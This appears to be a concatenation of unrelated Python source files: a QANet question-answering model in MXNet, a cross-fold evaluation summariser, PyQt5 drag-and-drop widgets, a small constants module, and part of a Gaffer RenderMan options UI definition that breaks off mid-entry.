import math
import mxnet as mx
from mxnet import gluon, nd
from mxnet.initializer import MSRAPrelu, Normal, Uniform, Xavier
from gluonnlp.initializer import HighwayBias
from gluonnlp.model import (ConvolutionalEncoder, DotProductAttentionCell,
Highway, MultiHeadAttentionCell)
from config import opt
from util import mask_logits
class MySoftmaxCrossEntropy(gluon.loss.Loss):
r"""Caluate the sum of softmax cross entropy.
Reference:
http://mxnet.incubator.apache.org/api/python/gluon/loss.html#mxnet.gluon.loss.SoftmaxCrossEntropyLoss
Parameters
----------
axis : int, default -1
The axis to sum over when computing softmax and entropy.
sparse_label : bool, default True
Whether label is an integer array instead of a probability distribution.
from_logits : bool, default False
Whether input is a log probability (usually from log_softmax) instead of
unnormalized numbers.
weight : float or None
Global scalar weight for loss.
batch_axis : int, default 0
The axis that represents mini-batch.
"""
def __init__(self, axis=-1, sparse_label=True, from_logits=False, weight=None, batch_axis=0,
**kwargs):
super(MySoftmaxCrossEntropy, self).__init__(
weight, batch_axis, **kwargs)
self.loss = gluon.loss.SoftmaxCrossEntropyLoss(axis=axis,
sparse_label=sparse_label,
from_logits=from_logits,
weight=weight,
batch_axis=batch_axis)
def forward(self, predict_begin, predict_end, label_begin, label_end):
r"""Implement forward computation.
Parameters
-----------
predict_begin : NDArray
Predicted probability distribution of answer begin position,
input tensor with shape `(batch_size, sequence_length)`
predict_end : NDArray
Predicted probability distribution of answer end position,
input tensor with shape `(batch_size, sequence_length)`
label_begin : NDArray
True label of the answer begin position,
input tensor with shape `(batch_size, )`
label_end : NDArray
True label of the answer end position,
input tensor with shape `(batch_size, )`
Returns
--------
out: NDArray
output tensor with shape `(batch_size, )`
"""
return self.loss(predict_begin, label_begin) + self.loss(predict_end, label_end)
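# Shape sketch (illustrative): for a batch of B contexts of length L, predict_begin and
# predict_end are (B, L) score matrices and label_begin/label_end are (B,) integer positions;
# each SoftmaxCrossEntropyLoss term yields a (B,) vector and their element-wise sum is returned.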
class QANet(gluon.HybridBlock):
r"""QANet model.
We implemented the QANet proposed in the following work::
@article{DBLP:journals/corr/abs-1804-09541,
author = {Adams Wei Yu and
David Dohan and
Minh{-}Thang Luong and
Rui Zhao and
Kai Chen and
Mohammad Norouzi and
Quoc V. Le},
title = {QANet: Combining Local Convolution with Global Self-Attention for
Reading Comprehension},
year = {2018},
url = {http://arxiv.org/abs/1804.09541}
}
"""
def __init__(self, **kwargs):
super(QANet, self).__init__(**kwargs)
with self.name_scope():
self.flatten = gluon.nn.Flatten()
self.dropout = gluon.nn.Dropout(opt.layers_dropout)
self.char_conv = ConvolutionalEncoder(
embed_size=opt.char_emb_dim,
num_filters=opt.char_conv_filters,
ngram_filter_sizes=opt.char_conv_ngrams,
conv_layer_activation=None,
num_highway=0
)
self.highway = gluon.nn.HybridSequential()
with self.highway.name_scope():
self.highway.add(
gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
flatten=False,
use_bias=False,
weight_initializer=Xavier()
)
)
self.highway.add(
Highway(
input_size=opt.emb_encoder_conv_channels,
num_layers=opt.highway_layers,
activation='relu',
highway_bias=HighwayBias(
nonlinear_transform_bias=0.0,
transform_gate_bias=0.0
)
)
)
self.word_emb = gluon.nn.HybridSequential()
with self.word_emb.name_scope():
self.word_emb.add(
gluon.nn.Embedding(
input_dim=opt.word_corpus,
output_dim=opt.word_emb_dim
)
)
self.word_emb.add(
gluon.nn.Dropout(rate=opt.word_emb_dropout)
)
self.char_emb = gluon.nn.HybridSequential()
with self.char_emb.name_scope():
self.char_emb.add(
gluon.nn.Embedding(
input_dim=opt.character_corpus,
output_dim=opt.char_emb_dim,
weight_initializer=Normal(sigma=0.1)
)
)
self.char_emb.add(
gluon.nn.Dropout(rate=opt.char_emb_dropout)
)
with self.name_scope():
self.emb_encoder = Encoder(
kernel_size=opt.emb_encoder_conv_kernerl_size,
num_filters=opt.emb_encoder_conv_channels,
conv_layers=opt.emb_encoder_num_conv_layers,
num_heads=opt.emb_encoder_num_head,
num_blocks=opt.emb_encoder_num_block
)
self.project = gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
flatten=False,
use_bias=False,
weight_initializer=Xavier()
)
with self.name_scope():
self.co_attention = CoAttention()
with self.name_scope():
self.model_encoder = Encoder(
kernel_size=opt.model_encoder_conv_kernel_size,
num_filters=opt.model_encoder_conv_channels,
conv_layers=opt.model_encoder_conv_layers,
num_heads=opt.model_encoder_num_head,
num_blocks=opt.model_encoder_num_block
)
with self.name_scope():
self.predict_begin = gluon.nn.Dense(
units=1,
use_bias=True,
flatten=False,
weight_initializer=Xavier(
rnd_type='uniform', factor_type='in', magnitude=1),
bias_initializer=Uniform(1.0/opt.model_encoder_conv_channels)
)
self.predict_end = gluon.nn.Dense(
units=1,
use_bias=True,
flatten=False,
weight_initializer=Xavier(
rnd_type='uniform', factor_type='in', magnitude=1),
bias_initializer=Uniform(1.0/opt.model_encoder_conv_channels)
)
def hybrid_forward(self, F, context, query, context_char, query_char,
y_begin, y_end):
r"""Implement forward computation.
Parameters
-----------
context : NDArray
input tensor with shape `(batch_size, context_sequence_length)`
query : NDArray
input tensor with shape `(batch_size, query_sequence_length)`
context_char : NDArray
input tensor with shape `(batch_size, context_sequence_length, num_char_per_word)`
query_char : NDArray
input tensor with shape `(batch_size, query_sequence_length, num_char_per_word)`
y_begin : NDArray
input tensor with shape `(batch_size, )`
y_end : NDArray
input tensor with shape `(batch_size, )`
Returns
--------
predicted_begin : NDArray
output tensor with shape `(batch_size, context_sequence_length)`
predicted_end : NDArray
output tensor with shape `(batch_size, context_sequence_length)`
"""
(batch, _) = context.shape
context_mask = context > 0
query_mask = query > 0
context_max_len = int(context_mask.sum(axis=1).max().asscalar())
query_max_len = int(query_mask.sum(axis=1).max().asscalar())
context = F.slice(context, begin=(0, 0), end=(batch, context_max_len))
query = F.slice(query, begin=(0, 0), end=(batch, query_max_len))
context_mask = F.slice(
context_mask,
begin=(0, 0),
end=(batch, context_max_len)
)
query_mask = F.slice(
query_mask,
begin=(0, 0),
end=(batch, query_max_len)
)
context_char = F.slice(
context_char,
begin=(0, 0, 0),
end=(batch, context_max_len, opt.max_character_per_word)
)
query_char = F.slice(
query_char,
begin=(0, 0, 0),
end=(batch, query_max_len, opt.max_character_per_word)
)
# word embedding
context_word_emb = self.word_emb(context)
query_word_emb = self.word_emb(query)
# char embedding
context_char_flat = self.flatten(context_char)
query_char_flat = self.flatten(query_char)
context_char_emb = self.char_emb(context_char_flat)
query_char_emb = self.char_emb(query_char_flat)
context_char_emb = F.reshape(
context_char_emb,
shape=(
batch*context_max_len,
opt.max_character_per_word,
opt.char_emb_dim
)
)
query_char_emb = F.reshape(
query_char_emb,
shape=(
batch*query_max_len,
opt.max_character_per_word,
opt.char_emb_dim
)
)
context_char_emb = F.transpose(context_char_emb, axes=(1, 0, 2))
query_char_emb = F.transpose(query_char_emb, axes=(1, 0, 2))
context_char_emb = self.char_conv(context_char_emb)
query_char_emb = self.char_conv(query_char_emb)
context_char_emb = F.reshape(
context_char_emb,
shape=(
batch,
context_max_len,
context_char_emb.shape[-1]
)
)
query_char_emb = F.reshape(
query_char_emb,
shape=(
batch,
query_max_len,
query_char_emb.shape[-1]
)
)
# concat word and char embedding
context_concat = F.concat(context_word_emb, context_char_emb, dim=-1)
query_concat = F.concat(query_word_emb, query_char_emb, dim=-1)
# highway net
context_final_emb = self.highway(context_concat)
query_final_emb = self.highway(query_concat)
# embedding encoder
# share the weights between passage and question
context_emb_encoded = self.emb_encoder(context_final_emb, context_mask)
query_emb_encoded = self.emb_encoder(query_final_emb, query_mask)
# context-query attention layer
M = self.co_attention(context_emb_encoded, query_emb_encoded, context_mask,
query_mask, context_max_len, query_max_len)
M = self.project(M)
M = self.dropout(M)
# model encoder layer
M_0 = self.model_encoder(M, context_mask)
M_1 = self.model_encoder(M_0, context_mask)
M_2 = self.model_encoder(M_1, context_mask)
# predict layer
begin_hat = self.flatten(
self.predict_begin(F.concat(M_0, M_1, dim=-1)))
end_hat = self.flatten(self.predict_end(F.concat(M_0, M_2, dim=-1)))
predicted_begin = mask_logits(begin_hat, context_mask)
predicted_end = mask_logits(end_hat, context_mask)
return predicted_begin, predicted_end, y_begin, y_end
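# Note: the same model_encoder block is applied three times, so M_0, M_1 and M_2 share
# parameters; the begin pointer is predicted from concat(M_0, M_1) and the end pointer from
# concat(M_0, M_2), matching the QANet output layer.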
class Encoder(gluon.HybridBlock):
r"""
Stacked block of Embedding encoder or Model encoder.
"""
def __init__(self, kernel_size, num_filters, conv_layers=2, num_heads=8,
num_blocks=1, **kwargs):
super(Encoder, self).__init__(**kwargs)
self.dropout = gluon.nn.Dropout(opt.layers_dropout)
total_layers = float((conv_layers + 2) * num_blocks)
sub_layer_idx = 1
self.num_blocks = num_blocks
self.stack_encoders = gluon.nn.HybridSequential()
with self.stack_encoders.name_scope():
for _ in range(num_blocks):
self.stack_encoders.add(
OneEncoderBlock(
kernel_size=kernel_size,
num_filters=num_filters,
conv_layers=conv_layers,
num_heads=num_heads,
total_layers=total_layers,
sub_layer_idx=sub_layer_idx
)
)
sub_layer_idx += (conv_layers + 2)
def hybrid_forward(self, F, x, mask):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, features)`
mask : NDArray
input tensor with shape `(batch_size, sequence_length)`
        Returns
        --------
        x : NDArray
            output tensor with shape `(batch_size, sequence_length, features)`
"""
for encoder in self.stack_encoders:
x = encoder(x, mask)
x = F.Dropout(x, p=opt.layers_dropout)
return x
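# Hedged usage sketch: the hyper-parameters below follow the QANet paper and are
# assumptions for illustration, not values read from `opt`.
#   emb_encoder = Encoder(kernel_size=7, num_filters=128, conv_layers=4,
#                         num_heads=8, num_blocks=1)
#   model_encoder = Encoder(kernel_size=5, num_filters=128, conv_layers=2,
#                           num_heads=8, num_blocks=7)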
class OneEncoderBlock(gluon.HybridBlock):
r"""The basic encoder block.
Parameters
----------
kernel_size : int
The kernel size for all depthwise convolution layers.
num_filters : int
The number of filters for all convolution layers.
conv_layers : int
The number of convolution layers in one encoder block.
num_heads : int
The number of heads in multi-head attention layer.
    total_layers : int
        The total number of sub-layers across all encoder blocks.
    sub_layer_idx : int
        Index of this block's first sub-layer; sub_layer_idx / total_layers
        scales the stochastic-depth drop probability of each sub-layer.
"""
def __init__(self, kernel_size, num_filters, conv_layers, num_heads, total_layers,
sub_layer_idx, **kwargs):
super(OneEncoderBlock, self).__init__(**kwargs)
self.position_encoder = PositionEncoder()
self.convs = gluon.nn.HybridSequential()
with self.convs.name_scope():
for _ in range(conv_layers):
one_conv_module = gluon.nn.HybridSequential()
with one_conv_module.name_scope():
one_conv_module.add(
gluon.nn.LayerNorm(epsilon=1e-06)
)
one_conv_module.add(
gluon.nn.Dropout(opt.layers_dropout)
)
one_conv_module.add(
DepthwiseConv(
kernel_size=kernel_size,
num_filters=num_filters,
input_channels=num_filters
)
)
one_conv_module.add(
StochasticDropoutLayer(
dropout=(sub_layer_idx / total_layers) *
(1 - opt.p_l)
)
)
sub_layer_idx += 1
self.convs.add(one_conv_module)
with self.name_scope():
self.dropout = gluon.nn.Dropout(opt.layers_dropout)
self.attention = SelfAttention(num_heads=num_heads)
self.attention_dropout = StochasticDropoutLayer(
(sub_layer_idx / total_layers) * (1 - opt.p_l))
sub_layer_idx += 1
self.attention_layer_norm = gluon.nn.LayerNorm(epsilon=1e-06)
self.positionwise_ffn = gluon.nn.HybridSequential()
with self.positionwise_ffn.name_scope():
self.positionwise_ffn.add(
gluon.nn.LayerNorm(epsilon=1e-06)
)
self.positionwise_ffn.add(
gluon.nn.Dropout(rate=opt.layers_dropout)
)
self.positionwise_ffn.add(
gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
activation='relu',
use_bias=True,
weight_initializer=MSRAPrelu(),
flatten=False
)
)
self.positionwise_ffn.add(
gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
use_bias=True,
weight_initializer=Xavier(),
flatten=False
)
)
self.positionwise_ffn.add(
StochasticDropoutLayer(
dropout=(sub_layer_idx / total_layers) * (1 - opt.p_l)
)
)
def hybrid_forward(self, F, x, mask):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
mask : NDArray
input tensor with shape `(batch_size, sequence_length)`
Returns
--------
x : NDArray
output tensor with shape `(batch_size, sequence_length, hidden_size)`
mask : NDArray
output tensor with shape `(batch_size, sequence_length)`
"""
x = self.position_encoder(x)
for conv in self.convs:
residual = x
x = conv(x) + residual
residual = x
x = self.attention_layer_norm(x)
x = F.Dropout(x, p=opt.layers_dropout)
x = self.attention(x, mask)
x = self.attention_dropout(x) + residual
return x + self.positionwise_ffn(x)
class StochasticDropoutLayer(gluon.HybridBlock):
r"""
    Stochastic depth: randomly drop an entire layer's output with the given probability.
"""
def __init__(self, dropout, **kwargs):
super(StochasticDropoutLayer, self).__init__(**kwargs)
self.dropout = dropout
with self.name_scope():
self.dropout_fn = gluon.nn.Dropout(dropout)
def hybrid_forward(self, F, inputs):
if F.random.uniform().asscalar() < self.dropout:
return F.zeros(shape=(1,))
else:
return self.dropout_fn(inputs)
class SelfAttention(gluon.HybridBlock):
r"""
Implementation of self-attention with gluonnlp.model.MultiHeadAttentionCell
"""
def __init__(self, num_heads, **kwargs):
super(SelfAttention, self).__init__(**kwargs)
with self.name_scope():
self.attention = MultiHeadAttentionCell(
num_heads=num_heads,
base_cell=DotProductAttentionCell(
scaled=True,
dropout=opt.layers_dropout,
use_bias=False
),
query_units=opt.emb_encoder_conv_channels,
key_units=opt.emb_encoder_conv_channels,
value_units=opt.emb_encoder_conv_channels,
use_bias=False,
weight_initializer=Xavier()
)
def hybrid_forward(self, F, x, mask):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
mask : NDArray
input tensor with shape `(batch_size, sequence_length)`
Returns
--------
x : NDArray
output tensor with shape `(batch_size, sequence_length, hidden_size)`
"""
mask = F.batch_dot(mask.expand_dims(axis=2), mask.expand_dims(axis=1))
return self.attention(x, x, mask=mask)[0]
class PositionEncoder(gluon.HybridBlock):
r"""
    An implementation of the sinusoidal position encoder.
"""
def __init__(self, **kwargs):
super(PositionEncoder, self).__init__(**kwargs)
with self.name_scope():
pass
def hybrid_forward(self, F, x, min_timescale=1.0, max_timescale=1e4):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
Returns
--------
: NDArray
output tensor with shape `(batch_size, sequence_length, hidden_size)`
"""
length = x.shape[1]
channels = x.shape[2]
position = nd.array(range(length))
num_timescales = channels // 2
log_timescale_increment = (
math.log(float(max_timescale) / float(min_timescale)) / (num_timescales - 1))
inv_timescales = min_timescale * \
nd.exp(nd.array(range(num_timescales)) * -log_timescale_increment)
scaled_time = F.expand_dims(
position, 1) * F.expand_dims(inv_timescales, 0)
signal = F.concat(F.sin(scaled_time), F.cos(scaled_time), dim=1)
signal = F.reshape(signal, shape=(1, length, channels))
return x + signal.as_in_context(x.context)
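# A minimal NumPy sketch (hypothetical helper, not used by the model) that mirrors
# the sinusoidal signal computed in PositionEncoder.hybrid_forward above.
def _sinusoid_signal_demo(length=4, channels=6, min_timescale=1.0, max_timescale=1e4):
    import math
    import numpy as np
    position = np.arange(length, dtype=float)
    num_timescales = channels // 2
    log_timescale_increment = (
        math.log(float(max_timescale) / float(min_timescale)) / (num_timescales - 1))
    inv_timescales = min_timescale * np.exp(
        np.arange(num_timescales) * -log_timescale_increment)
    # outer product of positions and inverse timescales -> (length, num_timescales)
    scaled_time = position[:, None] * inv_timescales[None, :]
    # first half of the channels holds sin, the second half holds cos
    signal = np.concatenate([np.sin(scaled_time), np.cos(scaled_time)], axis=1)
    return signal.reshape(1, length, channels)  # broadcast-added to (batch, length, channels)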
class DepthwiseConv(gluon.HybridBlock):
r"""
    An implementation of a depthwise-separable convolution (a depthwise convolution followed by a pointwise convolution).
"""
def __init__(self, kernel_size, num_filters, input_channels, **kwargs):
super(DepthwiseConv, self).__init__(**kwargs)
with self.name_scope():
self.depthwise_conv = gluon.nn.Conv1D(
channels=input_channels,
kernel_size=kernel_size,
padding=kernel_size // 2,
groups=input_channels,
use_bias=False,
weight_initializer=MSRAPrelu()
)
self.pointwise_conv = gluon.nn.Conv1D(
channels=num_filters,
kernel_size=1,
activation='relu',
use_bias=True,
weight_initializer=MSRAPrelu(),
bias_initializer='zeros'
)
def hybrid_forward(self, F, inputs):
r"""Implement forward computation.
Parameters
-----------
inputs : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
Returns
--------
x : NDArray
output tensor with shape `(batch_size, sequence_length, new_hidden_size)`
"""
tmp = F.transpose(inputs, axes=(0, 2, 1))
depthwise_conv = self.depthwise_conv(tmp)
outputs = self.pointwise_conv(depthwise_conv)
return F.transpose(outputs, axes=(0, 2, 1))
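# Rough parameter count for the block above, ignoring biases (the example numbers
# are illustrative, not read from the configuration):
#   standard Conv1D:            kernel_size * in_channels * num_filters
#   depthwise + pointwise here: kernel_size * in_channels + in_channels * num_filters
# e.g. kernel_size=7, in_channels=num_filters=128 -> 114,688 vs 896 + 16,384 = 17,280.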
class CoAttention(gluon.HybridBlock):
r"""
    An implementation of the context-query co-attention block.
"""
def __init__(self, **kwargs):
super(CoAttention, self).__init__(**kwargs)
with self.name_scope():
self.w4c = gluon.nn.Dense(
units=1,
flatten=False,
weight_initializer=Xavier(),
use_bias=False
)
self.w4q = gluon.nn.Dense(
units=1,
flatten=False,
weight_initializer=Xavier(),
use_bias=False
)
self.w4mlu = self.params.get(
'linear_kernel', shape=(1, 1, opt.emb_encoder_conv_channels), init=mx.init.Xavier())
self.bias = self.params.get(
'coattention_bias', shape=(1,), init=mx.init.Zero())
def hybrid_forward(self, F, context, query, context_mask, query_mask,
context_max_len, query_max_len, w4mlu, bias):
"""Implement forward computation.
Parameters
-----------
context : NDArray
input tensor with shape `(batch_size, context_sequence_length, hidden_size)`
query : NDArray
input tensor with shape `(batch_size, query_sequence_length, hidden_size)`
context_mask : NDArray
input tensor with shape `(batch_size, context_sequence_length)`
query_mask : NDArray
input tensor with shape `(batch_size, query_sequence_length)`
context_max_len : int
query_max_len : int
Returns
--------
return : NDArray
output tensor with shape `(batch_size, context_sequence_length, 4*hidden_size)`
"""
context_mask = F.expand_dims(context_mask, axis=-1)
query_mask = F.expand_dims(query_mask, axis=1)
similarity = self._calculate_trilinear_similarity(
context, query, context_max_len, query_max_len, w4mlu, bias)
similarity_dash = F.softmax(mask_logits(similarity, query_mask))
similarity_dash_trans = F.transpose(F.softmax(
mask_logits(similarity, context_mask), axis=1), axes=(0, 2, 1))
c2q = F.batch_dot(similarity_dash, query)
q2c = F.batch_dot(F.batch_dot(
similarity_dash, similarity_dash_trans), context)
return F.concat(context, c2q, context * c2q, context * q2c, dim=-1)
def _calculate_trilinear_similarity(self, context, query, context_max_len, query_max_len,
w4mlu, bias):
"""Implement the computation of trilinear similarity function.
refer https://github.com/NLPLearn/QANet/blob/master/layers.py#L505
The similarity function is:
f(w, q) = W[w, q, w * q]
where w and q represent the word in context and query respectively,
and * operator means hadamard product.
Parameters
-----------
context : NDArray
input tensor with shape `(batch_size, context_sequence_length, hidden_size)`
query : NDArray
input tensor with shape `(batch_size, query_sequence_length, hidden_size)`
        context_max_len : int
        query_max_len : int
Returns
--------
similarity_mat : NDArray
output tensor with shape `(batch_size, context_sequence_length, query_sequence_length)`
"""
subres0 = nd.tile(self.w4c(context), [1, 1, query_max_len])
subres1 = nd.tile(nd.transpose(
self.w4q(query), axes=(0, 2, 1)), [1, context_max_len, 1])
subres2 = nd.batch_dot(w4mlu * context,
nd.transpose(query, axes=(0, 2, 1)))
similarity_mat = subres0 + subres1 + subres2 + bias
return similarity_mat
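# A self-contained NumPy sketch (hypothetical, not used by the model) showing that
# the three terms assembled in _calculate_trilinear_similarity realise
# f(w, q) = W[w, q, w * q], with W split into w_c, w_q and w_m as stand-ins for
# the w4c, w4q and w4mlu parameters above.
def _trilinear_similarity_demo():
    import numpy as np
    rng = np.random.RandomState(0)
    batch, c_len, q_len, hidden = 2, 5, 3, 4
    context = rng.randn(batch, c_len, hidden)
    query = rng.randn(batch, q_len, hidden)
    w_c, w_q, w_m = rng.randn(hidden), rng.randn(hidden), rng.randn(hidden)
    term_c = (context @ w_c)[:, :, None]                       # w_c . w      -> (batch, c_len, 1)
    term_q = (query @ w_q)[:, None, :]                         # w_q . q      -> (batch, 1, q_len)
    term_m = np.einsum('bid,bjd->bij', context * w_m, query)   # w_m . (w * q)
    return term_c + term_q + term_m                            # (batch, c_len, q_len)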
|
python
|
import re, sys, glob
from os.path import join
from tabulate import tabulate
indir = sys.argv[1]
outfile = join(indir, "xfold_eval.txt")
name2fold = {}
for fold in range(5):
if fold not in name2fold:
name2fold[fold] = {}
file = join(indir, f"fold{fold}/eval.txt")
with open(file, 'r') as f:
tuple_performance, _, instance_performance = f.read().strip().split("Tuple Level")[1].strip().split("\n")
score = tuple_performance.split(",") + instance_performance.split(",")
for i, s in enumerate(score):
s = float(s.split(":")[1].strip())
score[i] = s
tupp, tupr, tupf, insp, insr, insf = score
name2fold[fold] = {
"tupp": tupp,
"tupr": tupr,
"tupf": tupf,
"insp": insp,
"insr": insr,
"insf": insf
}
def avg(l):
return sum(l)/len(l)
tupp = [name2fold[fold]['tupp'] for fold in range(5)]
tupr = [name2fold[fold]['tupr'] for fold in range(5)]
tupf = [name2fold[fold]['tupf'] for fold in range(5)]
insp = [name2fold[fold]['insp'] for fold in range(5)]
insr = [name2fold[fold]['insr'] for fold in range(5)]
insf = [name2fold[fold]['insf'] for fold in range(5)]
to_print = []
with open(outfile,'w') as f:
print(f"Saving to {outfile}")
to_print.append(["SCORE", "TUPLE P", "TUPLE R", "TUPLE F", "INS P", "INS R", "INS F"])
to_print.append(["AVG", avg(tupp), avg(tupr), avg(tupf), avg(insp), avg(insr), avg(insf)])
to_print.append(["---"] * 7)
to_print.extend([[f"FOLD{idx}", tp, tr, tf, ip, ir, iff] for idx, (tp, tr, tf, ip, ir, iff) in enumerate(zip(tupp, tupr, tupf, insp, insr, insf))])
f.write(tabulate(to_print))
|
python
|
# coding: utf-8
__doc__ = """包含一些继承自默认Qt控件的自定义行为控件。"""
import os
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QLineEdit, QTextEdit
class QLineEditMod(QLineEdit):
def __init__(self, accept="dir", file_filter=set()):
super().__init__()
self.setContextMenuPolicy(Qt.NoContextMenu)
self._accept = accept
self._filter = file_filter
self._drag_temp = ""
@property
def local_path(self):
return self.text().strip()
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
if self._accept == "file":
self._drag_temp = os.path.realpath(
event.mimeData().urls()[0].toLocalFile()
)
if (
not self._filter
or os.path.splitext(self._drag_temp)[1] in self._filter
):
event.accept()
else:
event.ignore()
elif self._accept == "dir":
event.accept()
else:
event.ignore()
else:
event.ignore()
def dropEvent(self, event):
if not self._drag_temp:
self._drag_temp = os.path.realpath(event.mimeData().urls()[0].toLocalFile())
if self._accept == "file" and os.path.isfile(self._drag_temp):
self.setText(self._drag_temp)
elif self._accept == "dir" and os.path.isdir(self._drag_temp):
self.setText(self._drag_temp)
class QTextEditMod(QTextEdit):
def __init__(self, accept="file", file_filter=set()):
super().__init__()
self.setLineWrapMode(QTextEdit.NoWrap)
self.setContextMenuPolicy(Qt.NoContextMenu)
self._accept = accept
self._filter = file_filter
self._drag_temp = list()
@property
def local_paths(self):
file_dir_paths = self.toPlainText().split("\n")
if self._accept == "dir":
return [path for path in file_dir_paths if os.path.isdir(path)]
if self._accept == "file":
return [path for path in file_dir_paths if os.path.isfile(path)]
return []
def _stash_from_urls(self, urls):
self._drag_temp.clear()
for file_or_dir in (path.toLocalFile() for path in urls):
file_or_dir = os.path.realpath(file_or_dir)
if os.path.isfile(file_or_dir):
self._drag_temp.append(file_or_dir)
continue
self._drag_temp.append(file_or_dir)
for root, _, files in os.walk(file_or_dir):
self._drag_temp.extend(
os.path.join(root, filename) for filename in files
)
def dragEnterEvent(self, event):
self._drag_temp.clear()
if event.mimeData().hasUrls():
if self._accept == "file":
self._stash_from_urls(event.mimeData().urls())
if not self._filter or set(
os.path.splitext(fp)[1]
for fp in self._drag_temp
if os.path.isfile(fp)
).issubset(self._filter):
event.accept()
else:
event.ignore()
elif self._accept == "dir":
event.accept()
else:
event.ignore()
if not self.toPlainText().endswith("\n"):
self.append("")
else:
event.ignore()
def dropEvent(self, event):
cur_text = self.toPlainText()
super().dropEvent(event)
if not self._drag_temp:
self._stash_from_urls(event.mimeData().urls())
if self._accept == "file":
self.setText(
cur_text
+ "\n".join(path for path in self._drag_temp if os.path.isfile(path))
)
elif self._accept == "dir":
self.setText(
cur_text
+ "\n".join(path for path in self._drag_temp if os.path.isdir(path))
)
else:
self.setText("")
        self.verticalScrollBar().setValue(self.verticalScrollBar().maximum())
|
python
|
"""
A collection of constants including error message
"""
ERROR_CLONE_TIMEOUT_EXPIRED = 'Timeout expired error'
ERROR_CLONE_FAILED = 'Cloning failed error'
|
python
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferRenderMan
def __qualitySummary( plug ) :
info = []
if plug["pixelSamples"]["enabled"].getValue() :
ps = plug["pixelSamples"]["value"].getValue()
info.append( "Pixel Samples %dx%d" % ( ps[0], ps[1] ) )
return ", ".join( info )
def __hiderSummary( plug ) :
info = []
if plug["hider"]["enabled"].getValue() :
info.append( plug["hider"]["value"].getValue().capitalize() )
if plug["hiderDepthFilter"]["enabled"].getValue() :
info.append( "Depth Filter : " + plug["hiderDepthFilter"]["value"].getValue().capitalize() )
if plug["hiderJitter"]["enabled"].getValue() :
info.append( "Jitter " + ( "On" if plug["hiderJitter"]["value"].getValue() else "Off" ) )
if plug["hiderSampleMotion"]["enabled"].getValue() :
info.append( "Sample Motion " + ( "On" if plug["hiderSampleMotion"]["value"].getValue() else "Off" ) )
if plug["hiderExtremeMotionDOF"]["enabled"].getValue() :
info.append( "Extreme MDOF " + ( "On" if plug["hiderExtremeMotionDOF"]["value"].getValue() else "Off" ) )
if plug["hiderProgressive"]["enabled"].getValue() :
info.append( "Progressive " + ( "On" if plug["hiderProgressive"]["value"].getValue() else "Off" ) )
return ", ".join( info )
def __statisticsSummary( plug ) :
info = []
if plug["statisticsLevel"]["enabled"].getValue() :
info.append( "Level %d" % plug["statisticsLevel"]["value"].getValue() )
if plug["statisticsFileName"]["enabled"].getValue() :
info.append( "File name" )
if plug["statisticsProgress"]["enabled"].getValue() :
info.append( "Progress " + ( "On" if plug["statisticsProgress"]["value"].getValue() else "Off" ) )
return ", ".join( info )
def __searchPathsSummary( plug ) :
info = []
for childName, label in (
( "shaderSearchPath", "Shaders" ),
( "textureSearchPath", "Textures" ),
( "displaySearchPath", "Displays" ),
( "archiveSearchPath", "Archives" ),
( "proceduralSearchPath", "Procedurals" ),
) :
if plug[childName]["enabled"].getValue() :
info.append( label )
return ", ".join( info )
Gaffer.Metadata.registerNode(
GafferRenderMan.RenderManOptions,
"description",
"""
Sets global scene options applicable to RenderMan
renderers. Use the StandardOptions node to set
global options applicable to all renderers.
""",
plugs = {
# Summaries
"options" : [
"layout:section:Quality:summary", __qualitySummary,
"layout:section:Hider:summary", __hiderSummary,
"layout:section:Statistics:summary", __statisticsSummary,
"layout:section:Search Paths:summary", __searchPathsSummary,
],
# Quality
"options.pixelSamples" : [
"description",
"""
The number of primary samples to divide each pixel into
in the X and Y directions. For example, 3x3 gives a total of
9 samples per pixel. This is the primary quality control for
geometric antialiasing and motion blur.
""",
"layout:section", "Quality",
],
# Hider
"options.hider" : [
"description",
"""
The "Hidden" hider means the classic REYES algorithm
is used, and the "Raytrace" hider means a more modern
raytraced algorithm is used.
""",
"layout:section", "Hider",
],
"options.hider.value" : [
"preset:Hidden", "hidden",
"preset:Raytrace", "raytrace",
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"options.hiderDepthFilter" : [
"description",
"""
The filter used to compute a single depth
value per pixel from the depths in each
pixel sample.
""",
"layout:section", "Hider",
"label", "Depth Filter",
